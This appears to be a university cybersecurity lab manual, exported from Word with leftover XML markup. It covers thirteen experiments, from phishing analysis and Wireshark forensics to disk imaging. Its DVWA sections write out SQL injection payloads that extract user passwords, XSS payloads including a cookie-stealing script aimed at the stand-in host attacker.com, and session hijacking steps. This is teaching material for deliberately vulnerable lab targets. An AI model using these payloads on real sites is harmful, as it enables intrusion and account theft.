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CYBER SECURITY LAB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All Experiments — Commands, Codes &amp; Procedures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1 — Password Strength Testing Using Python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(p1.py)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password_strength_checker(password):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if(len(password)&lt;8):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"Weak:password should contain atleast 8 length"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any(ch.isdigit() for ch in password):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"Weak:password should contain atleast 1 digit"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any(ch.islower() for ch in password):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"Weak:password should contain atleast 1 lower"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any(ch.isupper() for ch in password):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"Weak:password should contain atleast 1 upper"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re.search(r'[!@#$%^&amp;*(){}&lt;&gt;,.|]',password):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"Medium:Not special character"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"Strong password"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run():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while True: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input1=input("Enter your password or exit to exit");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if(input1.lower()=="exit"):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"exited"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break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print(password_strength_checker(input1));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run();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Command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 p1.py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Sample Input / Output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Input: abc123       → Weak:password should contain atleast 8 length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Input: Abcdef12     → Medium:Not special character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Input: Abc@1234     → Strong password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2 — Analyzing Phishing Emails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EML Analyzer — https://eml-analyzer.herokuapp.com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VirusTotal — https://www.virustotal.com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Sample file: 2020-05-05-phishing-email-example-01.eml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Upload .eml file to EML Analyzer online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Note: sender email, domain, IP, SPF/DKIM/DMARC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Check sender IP on VirusTotal: https://www.virustotal.com/gui/ip-address/&lt;IP&gt;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Check email breach: https://haveibeenpwned.com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 from Sample File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Sender Email: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sues@nnwifi.com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Domain: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nnwifi.com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Sender IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">94.100.31.27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IP Blacklisted: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes (1/93 vendors on VirusTotal)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SPF: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FAIL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DKIM: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Not signed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DMARC: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Not aligned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Suspicious URL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">https://servervirto.com.co/ed/trn/update?email=...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VERDICT: PHISHING EMAIL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3 — Packet Sniffing and Network Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, Python HTTP Server, tcpdump, Wireshark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Start Local HTTP Server (port 8080)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http.server 8080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Start Packet Capture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tcpdump -i any -w capture.pcap port 8080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Generate Traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Firefox → go to http://localhost:8080 → refresh multiple times.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Stop Capture &amp; Open in Wireshark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Stop: Ctrl + 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wireshark capture.pcap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Filter in Wireshark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http.request.method == "GET"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http.request.method == "POST"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tcp.port == 8080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Analyze Packet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Click any packet → view browser details, visited URLs, HTTP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If POST submitted: username &amp; password visible in plain text → HTTP is INSECURE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4 — Network Forensics Using Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, Wireshark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Launch Wireshark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wireshark &amp;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Select interface: eth0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Protocol Filters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udp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IP Address Filters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ip.addr == 192.168.0.161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ip.src  == 192.168.0.161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ip.dst  == 192.168.0.161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Follow TCP Stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click any TCP packet → Follow → TCP Stream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Detect Port Scanning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Run nmap from another terminal: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nmap -sS 192.168.0.156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Wireshark filter to detect SYN scan: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tcp.flags.syn == 1 &amp;&amp; tcp.flags.ack == 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Statistics Menu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Statistics → Capture File Properties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Statistics → Protocol Hierarchy Statistics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Statistics → Conversations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Statistics → Endpoints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Statistics → I/O Graphs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5 — SQL Injection Attack (DVWA via Docker)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Windows, Docker Desktop, Firefox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 — Run DVWA in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--rm -it -p 80:80 vulnerables/web-dvwa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Open browser: http://localhost/dvwa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Login: admin / password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Click: Create / Reset Database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Set Security Level: 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Navigate to SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA → Vulnerabilities → SQL Injection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Normal Input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Result: Shows user details for ID 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Authentication Bypass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OR '1'='1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Result: ALL user records displayed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Find Number of Columns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ORDER BY 1-- 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ORDER BY 2-- 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ORDER BY 3-- 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Stop when error appears; last successful = total columns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UNION-Based Injection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UNION SELECT 1,2-- -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Extract Database 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UNION SELECT database(),2-- -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Extract Table Names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UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=database()-- -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Extract Column Names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UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'-- -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Extract Usernames &amp; Passwords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1' UNION SELECT user,password FROM users-- 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Passwords appear as MD5 hashes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6 — XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, DVWA, Firefox. Setup same as SQL Injection.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Navigate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA → Vulnerabilities → XSS (Reflected / Stored / DOM)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Reflected XSS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&lt;script&gt;alert('XSS')&lt;/script&gt;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&lt;script&gt;alert(document.cookie)&lt;/script&gt;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src=x onerror=alert('XSS')&gt;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&lt;body onload=alert('XSS')&gt;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Stored XSS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&lt;script&gt;alert('Stored XSS')&lt;/script&gt;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&lt;script&gt;document.location='http://attacker.com/steal?c='+document.cookie&lt;/script&gt;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DOM-Based XSS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Inject in URL parameter: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http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=&lt;script&gt;alert('DOM XSS')&lt;/script&gt;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7 — Authentication Weaknesses &amp; Session Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, DVWA, Firefox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Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to: DVWA → Vulnerabilities → Brute Force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Username: admin  Password: admin     → FAIL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Username: admin  Password: 123456    → FAIL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Username: admin  Password: password  → SUCCESS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No lockout = Brute Force Vulnerability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Session ID Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After login: Right-click → Inspect → Storage → Cookies → note PHPSESSID (visible, not encrypted).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Session Hijacking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Login → copy PHPSESSID from DevTools → Storage →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Open Private Window (Ctrl+Shift+P) — do NOT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DevTools → Storage → Cookies → paste PHPSESSID →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Result: Logged in as admin WITHOUT password → Session Hijacking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Session Fixation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Note PHPSESSID before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Login → check PHPSESSID after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LOW security: PHPSESSID SAME before/after → Session Fixation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HIGH security: PHPSESSID CHANGES after login → Secure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E — Improper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Login → copy PHPSESSID →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Open Private Window → paste old PHPSESSID → http://127.0.0.1/dvwa/index.php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Result (LOW): Still logged in — logout did NOT destroy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Weak Password Login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Successful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Brute Force Attack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Allowed (no lockout)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ID Exposure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Found (plaintext)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Hijacking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Possible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Fixation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Observed (LOW level)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Improper Logout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reusable after logout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8 — Android App Permissions &amp; Mobile Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Android Studio, AVD, Burp Suite, ADB, Chrome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Start AVD with Proxy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C:\Users\Admin\AppData\Local\Android\Sdk\emulator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emulator -list-avds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emulator -avd Pixel_9 -http-proxy http://10.0.2.2:8080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Set Proxy via ADB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C:\Users\Admin\AppData\Local\Android\Sdk\platform-tools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adb devices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adb shell settings put global http_proxy 10.0.2.2:8080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adb shell settings get global http_proxy   # Expected: 10.0.2.2:8080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Configure Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy → Options → Proxy Listeners → Edit → All Interfaces → OK. Enable Intercept.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Export &amp; Install Burp CA Certificate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 Burp Suite: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Proxy → Options → Import/Export CA Certificate → DER → save as burpcer.der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Push to AVD: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adb push C:\Users\Admin\Downloads\burpcer.der /sdcard/Download/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 in AVD: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Settings → Security → Encryption &amp; Credentials → Install Certificate → CA Certificate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Verify HTTPS Interception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In AVD Chrome, visit https://example.com → check Burp Proxy → HTTP History.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Analyze App Permissions (Exodus Privacy)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Open: https://reports.exodus-privacy.eu.org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Search: WhatsApp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Note trackers: Google Analytics, Crashlytics, Facebook Analytics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9 — IoT Device Security (Default Passwords &amp; Open Ports)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Windows, Docker Desktop, OWASP Juice Shop, Kali Linux, Nmap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Deploy Juice Shop on Windows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-d -p 8090:3000 --name juiceshop bkimminich/juice-shop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Access at: http://localhost:8090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Find Host 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ipconfig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Note IPv4 address (e.g., 192.168.0.148)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Scan from Kali Linux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nmap -sV 192.168.0.148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Performs port scan, service/version detection, banner grabbing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Test Default Credentials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Navigate to: http://localhost:8090 →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Try: admin@juice-sh.op / admin123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Successful login = Default Password Vulnerability confirmed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Inspect Unencrypted Traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">F12 → Network tab → All HTTP requests visible in plain text → confirms unencrypted communication.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Vulnerabilities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Open Port 8090 → HTTP service exposed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Service version visible → enables targeted exploits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Unencrypted HTTP → data in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Weak/default credentials → no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Information disclosure via banner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10 — Disk Imaging and Forensic Analysis (dc3dd + Autopsy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, dc3dd, Autopsy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Evidence File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"Cybersecurity Lab Evidence" &gt; evidence.txt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lsblk   # Identify disk partition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Forensic Disk Image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dd if=/dev/zero of=practice_disk.dd bs=1M count=100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mkfs.ext4 practice_disk.dd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dc3dd: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dc3dd if=/dev/sda1 of=/home/kali/disk_image.dd hash=md5 log=/home/kali/acquisition.log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ls -lh /home/kali/disk_image.dd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/home/kali/acquisition.log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Start Autopsy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autopsy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Open: http://localhost:9999/autopsy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Create New Case in Autopsy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Click 'Create New Case' → enter case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Add Host → Add Image → browse to /home/kali/disk_image.dd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Click Next → Autopsy analyzes the image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Analyze Evidence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File Analysis   → view files and directories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Keyword Search  → search for specific terms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Deleted Files   → recover deleted items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File Type Sort  → sort by type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11 — File Analysis for Incident Detection (Log Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, journalctl, grep, awk, sort, lastb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 Directory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/var/log &amp;&amp; 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Key files: dpkg.log, apache2/, journal/, wtmp, btmp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last                                          # Successful logins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'Failed'                    # Failed SSH attempts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ssh                         # SSH activity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-i error                    # Error detection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less /var/log/apache2/access.log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grep '404' /var/log/apache2/access.log        # Detect probing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journalctl -f                            # Real-time monitoring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Simulate &amp; Analyze Failed SSH Logins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openssh-server -y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service ssh start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Generate failed attempts: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 fakeuser@localhost   # enter wrong password multiple times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Analyze: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'Failed password'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'Failed password' | awk '{print $11}'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| grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr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--since '10 minutes ago'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lastb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Suspicious If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Failed logins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lastb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 attempts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SSH activity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journalctl | grep ssh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Unknown connections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 history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Odd timing/unknown IP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journalctl | grep error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Repeated errors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logs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grep 404 access.log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 failed requests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12 — Privacy Audit of Apps &amp; Websites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Kali Linux, Wireshark, Burp Suite, Node.js, Nativefier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nodejs npm -y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npm install -g nativefier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nativefier https://web.whatsapp.com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WhatsAppWeb-linux-x64 &amp;&amp; ./WhatsAppWeb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 — WhatsApp Tracker Analysis (Exodus Privacy)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Open: https://reports.exodus-privacy.eu.org → Search: WhatsApp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Record trackers found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Wireshark capture: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wireshark   # interface: eth0 or wlan0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Filters: tls   dns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Observations: traffic TLS encrypted, domains: whatsapp.net, facebook.com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Message content NOT visible (good); metadata visible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 — Facebook Privacy via Burp Suite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burpsuite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Browser proxy: 127.0.0.1:8080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Intercept ON → reload Facebook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Look for cookies: datr, fr (tracking cookies), session IDs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F12 → Network tab: ads analytics, third-party requests, tracking pixels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3 — Email Breach Check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Go to: https://haveibeenpwned.com → enter email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Notable Data Breach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Facebook 2021: 533M users, phone/email/name leaked via API vulnerability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WhatsApp Pegasus: spyware via missed call (zero-click), buffer overflow in VoIP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 13 — Security Audit and Risk Assessment (Windows)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 (CMD)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msinfo32                            # System information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netstat -an                         # Open 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netstat -b                          # Active connections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netsh advfirewall show allprofiles  # Firewall status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 user                            # List user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systeminfo                          # System info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Settings → Windows Update → Check for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Windows Defender Firewall → Verify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Windows Security → Virus &amp; Threat Protection → Real-time: ON, Last scan: Recent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Settings → Accounts → Sign-in options → Password/PIN/Hello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Settings → Apps → Installed apps → Remove unknown/cracked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Task Manager (Ctrl+Shift+Esc) → Startup → Disable unnecessary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Settings → Network &amp; Internet → Type: Private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Browser → Settings → Privacy → Safe Browsing ON, remove unknown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Backup settings → OneDrive backup configured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Personal Files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Loss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Backup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Enable OneDrive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Malware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Unknown Apps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Remove apps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Hacking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Network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Switch to Private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Unauthorized Access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Weak Password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strong password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2026-05-15T20:36:51.369Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-15T20:36:51.369Z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